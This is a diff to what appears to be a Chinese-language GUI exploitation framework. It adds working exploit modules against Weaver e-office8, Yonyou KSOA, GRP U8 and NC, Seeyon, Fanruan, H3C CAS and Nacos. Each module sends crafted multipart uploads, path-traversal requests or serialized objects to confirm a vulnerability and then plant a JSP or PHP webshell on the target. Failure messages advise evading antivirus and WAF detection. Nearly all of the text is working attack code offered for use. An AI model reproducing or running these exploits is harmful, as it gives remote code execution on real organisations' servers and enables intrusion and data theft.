+                    textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/seeyonreport/WebReport/nishidazhu.svg.jsp");
+                });
+                return true;
+            }else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 疑似杀软查杀 请手动复现");
+            });
+            return false;
+        }
+    }
+
+}

src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java

@@ -0,0 +1,107 @@
+package exp.oa.weaveroa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class weaveroa_eoffice8_upload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean pay1 = pay1(url, textArea);
+        return pay1;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Boolean shell = shell(url, textArea);
+        return shell;
+    }
+
+    private Boolean pay1(String url, TextArea textArea) {
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+        String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhu.php4\"\n" +
+                "Content-Type: application/octet-stream\n" +
+                "\n" +
+                shell.readFile(shell.Testpath) + "\n" +
+                "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+        Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+
+        try {
+            String uri1 = post.getText().split("\\*")[0];
+            String uri2 = post.getText().split("\\*")[1];
+
+
+            String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+            Response response = HttpTools.get(geturl, new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+                Platform.runLater(() -> {
+                    textArea.appendText(
+                            "\n 漏洞存在 测试文件写入成功 \n " + geturl
+                    );
+                });
+                return true;
+            } else {
+                Platform.runLater(() -> {
+                    textArea.appendText(
+                            "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+                    );
+                });
+                return false;
+            }
+        } catch (Exception e) {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+                );
+            });
+            return false;
+        }
+
+
+    }
+
+    private Boolean shell(String url, TextArea textArea) {
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+        String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhuda.php4\"\n" +
+                "Content-Type: application/octet-stream\n" +
+                "\n" +
+                shell.readFile(shell.Phppath) + "\n" +
+                "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+        Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+        String uri1 = post.getText().split("\\*")[0];
+        String uri2 = post.getText().split("\\*")[1];
+
+        String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+        Response response = HttpTools.get(geturl, new HashMap<String, String>(), "utf-8");
+        if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在 shell文件写入成功 \n " + geturl
+                );
+            });
+            return true;
+        } else {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 疑似waf查杀，请手动测试"
+                );
+            });
+            return false;
+        }
+    }
+
+
+}

src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java

@@ -0,0 +1,60 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+
+public class yongyou_KSOA_Attachmentupload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Disposition","application/x-msdownload; ");
+        Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.txt", shell.test_payload, head, "utf-8");
+        Response response = HttpTools.get(url + "/pictures/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(()->{
+                textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/nishizhu.txt");
+            });
+            return true;
+        }else {
+            Platform.runLater(()->{
+                textArea.appendText("\n yongyou_KSOA_Attachmentupload-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=---------------------------122739796041499160471980406311");
+        Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.jsp", shell.readFile(shell.Jsppath), head, "utf-8");
+        Response response = HttpTools.get(url + "/pictures/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(()->{
+                textArea.appendText("\n 漏洞存在 webshell文件写入成功\n" + url + "/nishizhu.jsp");
+            });
+            return true;
+        }else {
+            Platform.runLater(()->{
+                textArea.appendText("\n waf拦截！！！请手动复现！！！");
+            });
+            return false;
+        }
+    }
+
+}

src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java

@@ -0,0 +1,87 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class yongyou_U8_AppProxy implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url,textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url,textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+        String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+                "Content-Type: image/png\n" +
+                "\n" +
+                "<% out.println(\"" + shell.test_payload + "\");%>\n" +
+                "--59229605f98b8cf290a7b8908b34616b--";
+
+        Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap<String, String>(), "utf-8");
+
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在，测试文件写入成功 " + url + "/hello_U8.jsp"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n yongyou_U8_AppProxy-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+                );
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url, TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+        String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+                "Content-Type: image/png\n" +
+                "\n" +
+                "<% out.println(\"" + shell.readFile(shell.Jsppath) + "\");%>\n" +
+                "--59229605f98b8cf290a7b8908b34616b--";
+
+        Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap<String, String>(), "utf-8");
+
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在，webshell文件写入成功 " + url + "/hello_U8.jsp"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(()->{
+                textArea.appendText("\n waf拦截！！！请手动复现！！！");
+            });
+            return false;
+        }
+    }
+
+
+
+}

src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java

@@ -35,7 +35,7 @@ public class yongyou_chajet_upload implements Exploitlnterface {
         Response post = HttpTools.post(url + "/tplus/SM/SetupAccount/Upload.aspx?preload=1", fir_post, this.headers, "utf-8");
         if (post.getCode() == 200) {
             Response response = HttpTools.get(url + "/tplus/SM/SetupAccount/images/" + filename, new HashMap<String, String>(), "utf-8");
-            if (response.getText().contains(shell.test_payload)) {
+            if (response.getText() != "" && response.getText().contains(shell.test_payload)) {
                 Platform.runLater(() -> {
                     textArea.appendText("\n 漏洞存在，测试文件写入成功 \n地址为：" + url + "/tplus/SM/SetupAccount/images/" + filename);
                 });

src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java

@@ -0,0 +1,122 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.net.HttpURLConnection;
+import java.util.HashMap;
+import java.util.Map;
+
+
+public class yongyou_nc_uploadServlet implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea) {
+        try {
+            HashMap<String, String> head = new HashMap<>();
+            head.put("Content-Type", "multipart/form-data;");
+            HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+            coon.setRequestMethod("POST");
+            coon.setDoOutput(true);
+            coon.setDoInput(true);
+            coon.setUseCaches(false);
+
+            for (String key : head.keySet()) {
+                coon.setRequestProperty(key, head.get(key));
+            }
+            OutputStream outputStream = coon.getOutputStream();
+            ObjectOutputStream out = new ObjectOutputStream(outputStream);
+            Map<String, Object> metaInfo = new HashMap<String, Object>();
+            metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+            metaInfo.put("FILE_NAME", "nishizhu.txt");
+            out.writeObject(metaInfo);
+            outputStream.write(shell.test_payload.getBytes());
+            out.flush();
+            out.close();
+            outputStream.close();
+            HttpTools.getResponse(coon, "utf-8");
+
+            Response get_res = HttpTools.get(url + "/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+            if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 反序列化漏洞存在 txt文件写入成功 \n" + url + "/nishizhu.txt");
+                });
+                return true;
+            } else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+                });
+                return false;
+            }
+
+        } catch (Exception e) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+                textArea.appendText("\n 连接异常！！！");
+            });
+        }
+        return false;
+    }
+
+    private Boolean shell(String url, TextArea textArea) {
+
+        try {
+            HashMap<String, String> head = new HashMap<>();
+            head.put("Content-Type", "multipart/form-data;");
+            HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+            coon.setRequestMethod("POST");
+            coon.setDoOutput(true);
+            coon.setDoInput(true);
+            coon.setUseCaches(false);
+
+            for (String key : head.keySet()) {
+                coon.setRequestProperty(key, head.get(key));
+            }
+            OutputStream outputStream = coon.getOutputStream();
+            ObjectOutputStream out = new ObjectOutputStream(outputStream);
+            Map<String, Object> metaInfo = new HashMap<String, Object>();
+            metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+            metaInfo.put("FILE_NAME", "nishizhu.jsp");
+            out.writeObject(metaInfo);
+            outputStream.write(shell.readFile(shell.Jsppath).getBytes());
+            out.flush();
+            out.close();
+            outputStream.close();
+            HttpTools.getResponse(coon, "utf-8");
+
+            Response get_res = HttpTools.get(url + "/nishizhu.jsp", new HashMap<>(), "utf-8");
+            if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 反序列化漏洞存在 shell文件写入成功 \n" + url + "/nishizhu.jsp");
+                });
+                return true;
+            } else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n shell被查杀 请免杀！！！！！！！！");
+                });
+                return false;
+            }
+
+        } catch (Exception e) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 连接异常！！！");
+            });
+        }
+        return false;
+    }
+
+}

src/main/java/utils/Kinds_Exp.java

@@ -1,17 +1,18 @@
 package utils;
 
 import core.Exploitlnterface;
+import exp.cms.nacos_Creatuser;
+import exp.equipment.h3c.cas_cvm_upload;
 import exp.equipment.hikvision.hik_applyCT_fastjson;
 import exp.equipment.qianxin.ngfw_waf_router;
 import exp.equipment.wangyu.Leadsec_ACM_account;
 import exp.middleware.iis.iis_put_rce;
+import exp.oa.fanruan.fanruan_save_svg;
 import exp.oa.landrayoa.landray_datajson;
+import exp.oa.landrayoa.landray_fileupload_sysSearch;
 import exp.oa.landrayoa.landray_sysSearchMain;
 import exp.oa.landrayoa.landray_treexmlTmpl;
-import exp.oa.seeyonoa.seeyonoa_ajaxBypass;
+import exp.oa.seeyonoa.*;
-import exp.oa.seeyonoa.seeyonoa_htmlofficeservlet;
-import exp.oa.seeyonoa.seeyonoa_main_log4j2;
-import exp.oa.seeyonoa.seeyonoa_wpsAssistServlet;
 import exp.oa.tongdaoa.tongdaoa_apiali;
 import exp.oa.tongdaoa.tongdaoa_getdata;
 import exp.oa.wanhuoa.wanhu_DocumentEdit;
@@ -19,15 +20,7 @@ import exp.oa.wanhuoa.wanhuoa_OfficeServer;
 import exp.oa.wanhuoa.wanhuoa_Officeserverservlet;
 import exp.oa.wanhuoa.wanhuoa_fileUploadController;
 import exp.oa.wanhuoa.wanhuoa_smartUpload;
-import exp.oa.weaveroa.weaveroa_BshServlet;
+import exp.oa.weaveroa.*;
-import exp.oa.weaveroa.weaveroa_KtreeUploadAction;
-import exp.oa.weaveroa.weaveroa_WorkflowServiceXml;
-import exp.oa.weaveroa.weaveroa_doExecl;
-import exp.oa.weaveroa.weaveroa_eoffice10_OfficeServer;
-import exp.oa.weaveroa.weaveroa_mobile6_sqlli;
-import exp.oa.weaveroa.weaveroa_office_UploadFile;
-import exp.oa.weaveroa.weaveroa_page_uploadOperation;
-import exp.oa.weaveroa.weaveroa_workrelate_uploadOperation;
 import exp.oa.yongyou.*;
 
 import java.util.ArrayList;
@@ -70,6 +63,7 @@ public class Kinds_Exp {
     kindList.add("OA");
     kindList.add("安全设备");
     kindList.add("中间件");
+    kindList.add("CMS");
     return kindList;
   }
 
@@ -82,6 +76,7 @@ public class Kinds_Exp {
     oa.add("万户-OA");
     oa.add("致远-OA");
     oa.add("通达-OA");
+    oa.add("帆软-OA");
     return FXCollections.observableArrayList(oa);
   }
 
@@ -96,12 +91,19 @@ public class Kinds_Exp {
   public static ObservableList<String> equipment() {
     ArrayList<String> equipment = new ArrayList<>();
     equipment.add("海康");
+    equipment.add("H3C");
     equipment.add("深信服");
     equipment.add("网御星云");
     equipment.add("奇安信");
     return FXCollections.observableArrayList(equipment);
   }
 
+  public static ObservableList<String> cms() {
+    ArrayList<String> equipment = new ArrayList<>();
+    equipment.add("Alibaba");
+    return FXCollections.observableArrayList(equipment);
+  }
+
   /*---------------------OA系列-------------------------*/
 
   //泛微oa
@@ -114,6 +116,7 @@ public class Kinds_Exp {
     expList.add("e-cology BshServlet-RCE");
     expList.add("e-cology KreeUploadAction-RCE");
     expList.add("e-office logo_UploadFile.php-RCE");
+    expList.add("e-office8 upload.php-RCE");
     expList.add("e-office10 OfficeServer.php-RCE");
     expList.add("e-office doexcel.php-RCE");
     expList.add("e-mobile_6.6 messageType.do-SQlli");
@@ -127,6 +130,14 @@ public class Kinds_Exp {
     expList.add("landray_sysSearchMain.do-RCE");
     expList.add("landray_treexmlTmpl-RCE");
     expList.add("landray_datajson-RCE");
+    expList.add("landray_fileupload_sysSearch-RCE");
+    return FXCollections.observableArrayList(expList);
+  }
+
+  public ObservableList<String> fanruan(){
+    expList = new ArrayList<>();
+    expList.add("All");
+    expList.add("fanruan-design_save_svg-RCE");
     return FXCollections.observableArrayList(expList);
   }
 
@@ -138,8 +149,11 @@ public class Kinds_Exp {
     expList.add("NC_bsh.servlet.BshServlet-RCE");
     expList.add("NC_NCFindWeb-Directory");
     expList.add("NC_FileReceiveServlet-RCE");
+    expList.add("NC_UploadServlet-RCE");
     expList.add("GRP_U8_UploadFileData-RCE");
+    expList.add("GRP_U8_AppProxy-RCE");
     expList.add("KSOA_ImageUpload-RCE");
+    expList.add("KSOA_Attachmentupload-RCE");
     return FXCollections.observableArrayList(expList);
   }
 
@@ -160,9 +174,11 @@ public class Kinds_Exp {
     expList = new ArrayList<>();
     expList.add("All");
     expList.add("seeyonoa_main_log4j2-RCE");
+    expList.add("seeyonoa_seeyonreport_upload-RCE");
     expList.add("seeyonoa_wpsAssisServlet-RCE");
     expList.add("seeyonoa_htmlofficeservlet-RCE");
     expList.add("seeyonoa_ajaxBypass-RCE");
+    expList.add("seeyon_testsqli-RCE");
     return FXCollections.observableArrayList(expList);
   }
 
@@ -196,6 +212,13 @@ public class Kinds_Exp {
     return FXCollections.observableArrayList(expList);
   }
 
+  public ObservableList<String> h3c() {
+    expList = new ArrayList<>();
+    expList.add("All");
+    expList.add("cas_cvm云计算管理平台-RCE");
+    return FXCollections.observableArrayList(expList);
+  }
+
   //奇安信
   public ObservableList<String> qianxin() {
     expList = new ArrayList<>();
@@ -211,6 +234,15 @@ public class Kinds_Exp {
     return FXCollections.observableArrayList(expList);
   }
 
+  /*---------------------CMS-------------------------*/
+
+  public ObservableList<String> Alibaba() {
+    expList = new ArrayList<>();
+    expList.add("All");
+    expList.add("nacos任意用户添加");
+    return FXCollections.observableArrayList(expList);
+  }
+
   public ObservableList<String> defaultList() {
     expList = new ArrayList<>();
     expList.add("All");
@@ -242,6 +274,15 @@ public class Kinds_Exp {
     }else if(vulName.contains("e-office doexcel.php-RCE")){
       ei = new weaveroa_doExecl();
     }
+    else if(vulName.contains("e-office8 upload.php-RCE")){
+      ei = new weaveroa_eoffice8_upload();
+    }
+
+
+    else if (vulName.contains("fanruan-design_save_svg-RCE")) {
+      //帆软
+      ei = new fanruan_save_svg();
+    }
 
     else if (vulName.contains("chajet_upload-RCE")) {
       //用友
@@ -256,15 +297,22 @@ public class Kinds_Exp {
       ei = new yongyou_grp_UploadFileData();
     }else if(vulName.contains("KSOA_ImageUpload-RCE")){
       ei = new yongyou_KSOA_imageupload();
-    }
+    }else if(vulName.contains("NC_UploadServlet-RCE")){
+      ei = new yongyou_nc_uploadServlet();
+    } else if (vulName.contains("GRP_U8_AppProxy-RCE")) {
+      ei = new yongyou_U8_AppProxy();
+    } else if (vulName.contains("KSOA_Attachmentupload-RCE")) {
+      ei = new yongyou_KSOA_Attachmentupload();
 
-    else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
+    } else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
       //蓝凌
       ei = new landray_sysSearchMain();
     } else if (vulName.contains("landray_treexmlTmpl-RCE")) {
       ei = new landray_treexmlTmpl();
     } else if (vulName.contains("landray_datajson-RCE")) {
       ei = new landray_datajson();
+    } else if (vulName.contains("landray_fileupload_sysSearch-RCE")) {
+      ei = new landray_fileupload_sysSearch();
     }
 
     else if(vulName.contains("wanhu_OfficeServer-RCE")){
@@ -289,6 +337,10 @@ public class Kinds_Exp {
       ei = new seeyonoa_htmlofficeservlet();
     }else if(vulName.contains("seeyonoa_ajaxBypass-RCE")){
       ei = new seeyonoa_ajaxBypass();
+    }else if(vulName.contains("seeyonoa_seeyonreport_upload-RCE")){
+      ei = new seeyonreport_svg_upload();
+    }else if (vulName.contains("seeyon_testsqli-RCE")) {
+      ei = new seeyon_testsqli();
     }
 
     else if(vulName.contains("tongdaoa_getdata-RCE")){
@@ -315,7 +367,16 @@ public class Kinds_Exp {
     else if(vulName.contains("上网行为管理账号密码泄露_Leadsec_ACM")){
       //网御星云
       ei = new Leadsec_ACM_account();
+    } else if (vulName.contains("cas_cvm云计算管理平台-RCE")) {
+      //h3c
+      ei = new cas_cvm_upload();
     }
+
+    /*-----CMS-----*/
+    else if (vulName.contains("nacos任意用户添加")) {
+      ei = new nacos_Creatuser();
+    }
+
     return ei;
   }
 }

src/main/java/utils/shell.java

@@ -42,6 +42,11 @@ public class shell {
 //     public static String dnspath = "./Apt_config/dnslog/dnslog.txt";
 
 
+
+//    public static final String open = "notepad ";
+    public static final String open = "open ";
+
+
     //标记内容
     public static final String test_payload = "9df37afc77bdd582d90aefaf4e35c63e";
 
@@ -179,4 +184,26 @@ public class shell {
         }
         return sb.toString();
     }
+
+
+
+    /*-------------------------------url编码方法---------------------------*/
+
+    public static String gbEncoding(String gbString) {
+        char[] utfBytes = gbString.toCharArray();
+        String unicodeBytes = "";
+
+        for(int i = 0; i < utfBytes.length; ++i) {
+            String hexB = Integer.toHexString(utfBytes[i]);
+            if (hexB.length() <= 2) {
+                hexB = "00" + hexB;
+            }
+
+            unicodeBytes = unicodeBytes + "\\u" + hexB;
+        }
+
+        return unicodeBytes;
+    }
+
+
 }